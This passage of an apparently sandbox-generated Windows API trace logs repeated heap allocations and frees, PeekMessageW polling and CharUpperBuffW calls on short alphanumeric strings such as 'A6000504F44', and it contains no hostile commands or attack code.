wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0207.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0207.033] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0207.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0207.033] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0207.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0207.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x12283) returned 0x24c7a50 [0207.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0207.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0207.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0207.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1368 [0207.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0207.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0207.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0207.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0207.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x12283) returned 0x34c2258 [0207.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0207.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0207.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0207.037] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0207.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0207.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.038] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0207.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0207.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0207.038] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.038] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0207.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0207.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0207.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0207.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0207.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.042] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0207.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.043] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0207.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0207.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0207.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0207.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0207.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0207.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0207.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0207.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.053] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.053] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.053] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.054] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.054] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.054] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.054] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.054] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.055] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.055] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.056] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.056] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.056] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.056] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.056] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.056] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.057] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 